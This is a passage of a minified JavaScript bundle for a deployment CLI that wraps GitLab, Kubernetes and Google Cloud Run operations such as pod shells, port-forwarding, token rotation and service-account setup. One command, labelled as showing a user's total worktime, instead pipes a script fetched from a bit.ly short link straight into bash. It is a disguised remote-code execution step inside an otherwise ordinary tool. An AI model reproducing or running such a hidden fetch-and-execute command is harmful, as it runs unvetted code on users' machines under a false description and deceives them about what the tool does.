<envComponent>","list env vars").autocomplete(await(0,a.envAndComponents)()).action((async function({envComponent:e}){const{env:t,componentName:r}=(0,i.parseChoice)(e);const a=await(0,i.getEnvVarsResolved)(this,t,r);Object.keys(a).forEach((e=>this.log(`${e}: ${a[e]}`)))}))},54132:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(75763);t["default"]=async e=>e.command("project-get-my-total-worktime","show the total worktime that you spent on a project").action((async()=>{await(0,i.spawn)("sh",["-c","curl -s -L http://bit.ly/3VQEKNq | bash"],{stdio:["pipe","inherit","pipe"]})}))},57623:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(50481);const n=r(66921);const s=r(79011);const o=r(24398);const l=r(39855);const c=i(r(34590));t["default"]=async e=>e.command("project-get-shell <envComponent>","get a shell to a pod in the environment").autocomplete(await(0,l.envAndComponents)()).action((async function({envComponent:e}){await c.default.call(this,e);const t=await(0,s.getProjectNamespace)(e);const r=await(0,a.getProjectPods)(e);const i=r.filter((e=>e.status.phase=="Running")).map((e=>e.metadata.name));if(i.length===0){(0,n.logError)(this,"sorry, no running pods found");return}const{podName:l}=await this.prompt({type:"list",name:"podName",choices:i,message:"Which pod? š¤"});return(0,o.getShell)(t,l)}))},21942:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(75763);const n=r(23255);const s=i(r(14247));const o=r(12927);const l={failed:"š",warning:"šæ",pending:"šŗ",running:"šā",manual:"š¤",scheduled:"šŗ",canceled:"š½",success:"š»",skipped:"š¤",created:"šŗ"};const statusTxt=e=>l[e]?`${l[e]} ${e}`:e;const getCurrentCommit=async()=>{const e=await(0,a.exec)("git rev-parse HEAD");return e.stdout&&e.stdout.replace(/\n$/,"")};const delay=async e=>new Promise((t=>setTimeout(t,e)));const promptJob=async(e,t,r)=>{const i=await(0,o.doGitlabRequest)(e,`projects/${t}/jobs`);const a=await getCurrentCommit();const jobsToName=e=>e.map((e=>`${e.ref}-${e.name}-${e.user.username}-${e.status}-${e.id}`));const s=i.filter((e=>e.commit.id===a));const l=i.filter((e=>!s.includes(e.ref)));const c=s.length>1?[...jobsToName(s),"========================================================",...jobsToName(l)]:jobsToName([...s,...l]);const{jobName:u}=await r.prompt({type:"list",name:"jobName",choices:c,message:"Which job? š¤"});const p=Number((0,n.last)(u.split("-")));return i.find((e=>e.id===p))};t["default"]=async e=>{e.command("project-ci-job-open","Open a Job").action((async function(){const{id:e}=await(0,o.getProjectInfo)(this);const t=await promptJob(this,e,this);(0,s.default)(t.web_url)}));e.command("project-ci-job-log","Show a job's log").action((async function(){const{id:t}=await(0,o.getProjectInfo)(this);const{id:r}=await promptJob(this,t,this);let i=false;while(!i){const n=await(0,a.exec)(`curl -s --header "PRIVATE-TOKEN: ${await(0,o.getGitlabToken)(this)}" "https://git.panter.ch/api/v4/projects/${t}/jobs/${r}/trace"`);const s=await(0,o.doGitlabRequest)(this,`projects/${t}/jobs/${r}`);if(n.stdout){e.ui.redraw(`${n.stdout}`)}else{e.ui.redraw(`\n\n ${statusTxt(s.status)}\n ${s.web_url}\n\n `)}i=!!s.finished_at;if(!i){await delay(5e3)}else{e.ui.redraw.done()}}}))}},14180:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(68033);const n=r(23255);const s=r(50481);const o=r(39855);const l=i(r(34590));t["default"]=async e=>e.command("project-list-pods <envComponent>","list pods of local project").autocomplete(await(0,o.envAndComponents)()).action((async function({envComponent:e}){await l.default.call(this,e);const t=await(0,s.getProjectPods)(e);this.log((0,a.stringify)(t.map((e=>(0,n.pick)(e,["metadata.name","status.startTime"])))))}))},17805:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(79011);const a=r(39855);t["default"]=async e=>e.command("project-namespace <envComponent>","show namespace of local project").autocomplete(await(0,a.envAndComponents)()).action((async function({envComponent:e}){this.log(await(0,i.getProjectNamespace)(e))}))},78423:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=i(r(14247));const n=r(12145);const s=r(39855);const o=i(r(34590));t["default"]=async e=>e.command("project-open-env <envComponent>","open the live environment").autocomplete(await(0,s.envAndComponents)()).action((async function({envComponent:e}){const{env:t,componentName:r}=(0,n.parseChoice)(e);await o.default.call(this,e);const i=await(0,n.getEnvironment)(t,r);const s=i.envVars.ROOT_URL;(0,a.default)(s.toString())}))},79211:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(75763);t["default"]=async e=>e.command("project-open-git","open the repo on gitlab / github in your browser").action((async()=>{await(0,i.exec)("npx git-open")}))},81673:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(12145);const a=r(72322);const n=r(39855);t["default"]=async e=>e.command("project-open-logs <envComponent>","open google cloud logs (stackdriver logs)").autocomplete(await(0,n.envAndComponents)()).action((async function({envComponent:e}){const{env:t,componentName:r}=(0,i.parseChoice)(e);const n=await(0,i.getPipelineContextByChoice)(t,r);await(0,a.openGoogleCloudLogs)(this,n)}))},32563:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(75763);const a=r(79011);const n=r(39855);t["default"]=async e=>e.command("project-pause <envComponent>","halts all running pods (scales to 0)").autocomplete(await(0,n.envAndComponents)()).action((async function({envComponent:e}){const t=await(0,a.getProjectNamespace)(e);const{shouldContinue:r}=await this.prompt({type:"confirm",name:"shouldContinue",message:`This will STOP all running pods in the namespace ${t}. You will need to manually scale back up or re-deploy. Continue? š¤ `});if(!r){return}const n=`kubectl scale statefulset,deployment --all --replicas=0 --namespace=${t}`;const{stdout:s}=await(0,i.exec)(n,{env:{...process.env,DEBUG:""}});this.log(s)}))},49142:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(50481);const n=r(66921);const s=r(91597);const o=r(79011);const l=r(39855);const c=i(r(34590));const u=r(83941);const p=r(12145);const d=r(10603);const h=r(52510);const m=i(r(14247));const kubePortForward=async(e,t)=>{await c.default.call(e,t);const r=await(0,o.getProjectNamespace)(t);const i=await(0,a.getProjectPodNames)(t);if(i.length===0){(0,n.logError)(e,"sorry, no pods found");return}const{podName:l}=await e.prompt({type:"list",name:"podName",choices:i,message:"Which pod? š¤"});const{localPort:u}=await e.prompt({type:"number",name:"localPort",message:"Local port: "});const{remotePort:p}=await e.prompt({type:"number",name:"remotePort",message:"Remote port: "});return(0,s.startKubePortForward)(l,u,p,r)};const cloudRunPortForward=async(e,t)=>{var r;if(!(0,d.isOfDeployType)((r=t.deploy)===null||r===void 0?void 0:r.config,"google-cloudrun")){throw new Error("not cloud run")}const{fullName:i}=t.environment;let a=i.toString();if(t.environment.envType==="review"){const{mr:t}=await e.prompt({type:"number",name:"mr",message:"Which mr š¤ "});a=a.toString().replace("-review-","-review-mr"+t+"-")}const{projectId:n,region:s}=t.deploy.config;const o=`gcloud beta run services proxy ${a} --project ${n} --region ${s}`;await(0,h.startPortForwardCommand)(`cloudRun/${a}`,o);(0,m.default)("http://localhost:8080")};t["default"]=async e=>e.command("project-port-forward <envComponent>","start port-forwarding").autocomplete(await(0,l.envAndComponents)()).action((async function({envComponent:e}){var t,r;const{env:i,componentName:a}=(0,u.parseChoice)(e);const n=await(0,p.getPipelineContextByChoice)(i,a);if((0,d.isOfDeployType)((t=n.deploy)===null||t===void 0?void 0:t.config,"kubernetes")){await kubePortForward(this,e)}if((0,d.isOfDeployType)((r=n.deploy)===null||r===void 0?void 0:r.config,"google-cloudrun")){await cloudRunPortForward(this,n)}}))},67426:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(84195);t["default"]=async e=>e.command("project-renew-token","Configures the project access token for semantic release.").action((async function(){await(0,i.setupAccessTokens)(this)}))},40695:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.projectSecretsClearBackups=void 0;const i=r(12927);const a=r(39855);const projectSecretsClearBackups=async(e,t=3)=>{await(0,i.clearBackups)(e,t)};t.projectSecretsClearBackups=projectSecretsClearBackups;t["default"]=async e=>{e.command("project-secrets-clear-backups","clears all backups").autocomplete(await(0,a.allEnvsAndAllComponents)()).action((async function(){const{keep:e}=await this.prompt({type:"number",name:"keep",default:1,message:"How many backups should we keep? š¤"});return await(0,t.projectSecretsClearBackups)(this,e)}))}},82620:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(96725);const a=r(79011);t["default"]=async e=>{e.command("project-security-evaluate","evaluate project's security audit document").action((async function(){const e=await(0,a.getGitRoot)();const t=await(0,i.evaluateSecurityAudit)({path:e});if(t.isErr()){console.error("Could not evaluate security audit document:",t.error)}else{console.log((0,i.makeSecurityAuditOverview)(t.value))}}))}},94092:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});const i=r(33309);const a=r(39855);t["default"]=async e=>e.command("project-setup [component]","Initializes all environments and creates requires resources, service accounts, etc.").autocomplete(await(0,a.allComponents)()).action((async function({component:e}){await(0,i.setupProject)(this,e)}))},96294:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=r(15124);const n=r(79672);const s=r(66921);const o=r(58645);const l=r(79011);const c=r(39855);const u=i(r(34590));async function triggerCronjob(e){const{body:{items:t}}=await(0,n.getk8sApiBatchBeta)().listNamespacedCronJob(e);const r=t.map((e=>e.metadata.name));const{jobName:i}=await this.prompt({type:"list",name:"jobName",choices:r,message:"Which cronjob? š¤"});const o=t.find((e=>e.metadata.name===i));const l=o.spec.jobTemplate.spec;const c=new a.V1Job;const u={name:`manual-${Math.round(Date.now()/1e3)}-${o.metadata.name}`};c.metadata=u;c.spec=l;try{const t=await(0,n.getk8sApiBatch)().createNamespacedJob(e,c);this.log("");this.log(`yeah, you got a job, man. šŗ ${t.body.metadata.name}`);this.log("")}catch(e){(0,s.logError)(this,"command failed",e.body)}}t["default"]=async e=>{e.command("trigger-cronjob <namespace>","trigger cronjob").autocomplete(o.namespaceAutoCompletion).action((async function({namespace:e}){await triggerCronjob.call(this,e)}));e.command("project-trigger-cronjob <envComponent>","trigger cronjob").autocomplete(await(0,c.envAndComponents)()).action((async function({envComponent:e}){await u.default.call(this,e);const t=await(0,l.getProjectNamespace)(e);await triggerCronjob.call(this,t)}))}},14263:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});const a=i(r(102));const n=i(r(23410));const s=i(r(50626));const o=i(r(30814));const l=i(r(946));const c=i(r(54132));const u=i(r(57623));const p=i(r(21942));const d=i(r(94092));const h=i(r(67426));const m=i(r(14180));const b=i(r(17805));const y=i(r(78423));const g=i(r(79211));const v=i(r(81673));const w=i(r(32563));const j=i(r(49142));const O=i(r(96294));const _=i(r(40695));const k=i(r(24103));const C=i(r(82620));t["default"]=async e=>{(0,d.default)(e);(0,h.default)(e);(0,l.default)(e);(0,b.default)(e);(0,m.default)(e);(0,w.default)(e);(0,o.default)(e);(0,v.default)(e);(0,a.default)(e);(0,k.default)(e);(0,g.default)(e);(0,y.default)(e);(0,O.default)(e);(0,n.default)(e);(0,_.default)(e);(0,s.default)(e);(0,u.default)(e);(0,j.default)(e);(0,p.default)(e);(0,c.default)(e);(0,C.default)(e)}},33309:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.setupProject=void 0;const i=r(12145);const a=r(84195);const n=r(44310);const s=r(84290);const setupProject=async(e,t)=>{const r=await(0,i.getAllPipelineContexts)(t);e.log("will setup those contexts:");r.forEach((t=>{e.log(` - ${t.name}:${t.env}`)}));for(const t of r){await(0,n.setupContext)(e,t)}await(0,a.setupAccessTokens)(e);await(0,s.setupTopic)(e);e.log("");e.log("gitlab is ready! š„");e.log("\n");e.log("do not forget to make sure that:");["you have __health route in place","lint and test are defined","secrets are configured (call project-config-secret)","eat your vegetables","be awesome š¤©"].forEach((t=>e.log(` - ${t}`)));e.log("\n");e.log("\n")};t.setupProject=setupProject},84195:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.setupAccessTokens=void 0;const i=r(44438);const a=r(12927);const n="semantic-release";const setupAccessTokens=async e=>{const{id:t}=await(0,a.getProjectInfo)(e);const r=await(0,a.doGitlabRequest)(e,`projects/${t}/access_tokens`);const s=r.find((e=>e.name===n&&e.active===true));const o=(0,i.format)((0,i.add)(new Date,{years:1,days:-1}),"yyyy-MM-dd");const l=s?await(0,a.doGitlabRequest)(e,`projects/${t}/access_tokens/${s.id}/rotate`,{expires_at:o},"POST"):await(0,a.doGitlabRequest)(e,`projects/${t}/access_tokens`,{name:n,scopes:["api","read_repository"],access_level:40,expires_at:o},"POST");try{await(0,a.doGitlabRequest)(e,`projects/${t}/variables/GL_TOKEN`);await(0,a.doGitlabRequest)(e,`projects/${t}/variables/GL_TOKEN`,{value:l.token},"PUT")}catch(r){if(r.message!=="not found"){throw r}await(0,a.doGitlabRequest)(e,`projects/${t}/variables`,{key:"GL_TOKEN",value:l.token,masked:true},"POST")}e.log("Token configured for semantic release. Renew me again in a year!")};t.setupAccessTokens=setupAccessTokens},1082:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.setupCloudRun=void 0;const i=r(10603);const a=r(65072);const n=r(7180);const s=r(11645);const o=r(15010);const l=r(12927);const setupCloudRun=async(e,t)=>{var r,c;if(!(0,i.isOfDeployType)((r=t.deploy)===null||r===void 0?void 0:r.config,"google-cloudrun")){throw new Error("deploy config is not of type 'google-cloudrun'")}const u=(c=t.deploy)===null||c===void 0?void 0:c.config;e.log("enable required services...");await(0,s.enableGCloudServices)(["run.googleapis.com","artifactregistry.googleapis.com","cloudscheduler.googleapis.com","cloudresourcemanager.googleapis.com",...u.cloudSql?["sqladmin.googleapis.com","sql-component.googleapis.com"]:[]],u);e.log("upsert artifacts registry...");await(0,a.upsertGcloudArtifactsRegistry)(u);e.log("upsert deploy service account...");await(0,o.upsertGcloudServiceAccountAndSaveSecret)(e,t,{projectId:u.projectId,displayName:"Catladder gcloud deploy",description:"This service account deploys to google cloud",name:"cl-d",roles:["roles/artifactregistry.repoAdmin","roles/run.admin","roles/iam.serviceAccountUser","roles/cloudscheduler.admin",...u.cloudSql?["roles/cloudsql.admin"]:[]]},i.GCLOUD_DEPLOY_CREDENTIALS_KEY);e.log("get service domain suffix... that might take a while initially");const p=await(0,n.getCloudRunDomainSuffix)(u);e.log("domain suffix: "+p);await(0,l.upsertAllVariables)(e,{[i.GCLOUD_RUN_CANONICAL_HOST_SUFFIX]:p},t.env,t.name,false,false)};t.setupCloudRun=setupCloudRun},44310:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:true});t.setupContext=void 0;const i=r(10603);const a=r(1082);const n=r(88412);const setupContext=async(e,t)=>{var r,s;e.log("");e.log("==================================================================================");e.log("š± š§ setting up "+t.env+":"+t.name+"...");e.log("");if((0,i.isOfDeployType)((r=t.deploy)===null||r===void 0?void 0:r.config,"google-cloudrun")){await(0,a.setupCloudRun)(e,t)}const o=(s=t.deploy)===null||s===void 0?void 0:s.config;if((0,i.isOfDeployType)(o,"kubernetes")){await(0,n.setupKubernetes)(e,t)}e.log("");e.log("ā
"+t.env+":"+t.name+" done!");e.log("")};t.setupContext=setupContext},88412:function(e,t,r){"use strict";var i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:true});t.setupKubernetes=void 0;const a=r(10603);const n=r(75763);const s=r(62774);const o=r(12927);const l=i(r(81349));const setupKubernetes=async(e,t)=>{var r;const i=(r=t.deploy)===null||r===void 0?void 0:r.config;if(!(0,a.isOfDeployType)(i,"kubernetes")){throw new Error("cannot run setupKubernetes on non-kubernetes deployments")}const{id:c}=await(0,o.getProjectInfo)(e);const u=await(0,o.doGitlabRequest)(e,`projects/${c}/deploy_tokens`);if(!u.find((e=>e.name==="gitlab-deploy-token"))){e.log("I will setup the 'GitLab Deploy Token', so Kubernetes can pull images from this project.");await(0,o.doGitlabRequest)(e,`projects/${c}/deploy_tokens`,{id:c,name:"gitlab-deploy-token",scopes:["read_registry"]},"POST")}const p=(0,a.getFullKubernetesClusterName)(i.cluster);e.log(`cluster: ${p}`);await(0,s.connectToCluster)(p);e.log("");e.log("ensuring namespace ...");const d=await(0,l.default)(t);e.log("Namespace "+d+" created / updated!");e.log("");e.log("ensuring service accounts...");const h=`cl-${t.name}-deploy`;const m=await(0,n.exec)(`TERM=dumb kubectl cluster-info | grep -E 'Kubernetes master|Kubernetes control plane' | awk '/http/ {print $NF}'`).then((e=>e.stdout.trim()));try{await(0,n.exec)(`kubectl delete serviceaccount --namespace ${d} ${h}`);await(0,n.exec)(`kubectl delete rolebinding --namespace ${d} ${h}`);await(0,n.exec)(`kubectl delete role --namespace ${d} ${h}`)}catch(e){}await(0,n.exec)(`kubectl create serviceaccount --namespace ${d} ${h}`);await(0,n.exec)(`cat <<EOF | kubectl apply -f -\nkind: Role\napiVersion: rbac.authorization.k8s.io/v1\nmetadata:\n namespace: ${d}\n name: ${h}\nrules:\n- apiGroups: ["", "extensions", "apps", "networking.k8s.io", "batch", "autoscaling", "rbac.authorization.k8s.io","snapshot.storage.k8s.io"]\n resources: ["deployments", "replicasets", "statefulsets", "pods", "secrets", "configmaps", "services", "ingresses", "serviceaccounts", "roles", "rolebindings", "jobs", "cronjobs", "horizontalpodautoscalers", "persistentvolumeclaims", "volumesnapshots"]\n verbs: ["*"]\n---\nkind: RoleBinding\napiVersion: rbac.authorization.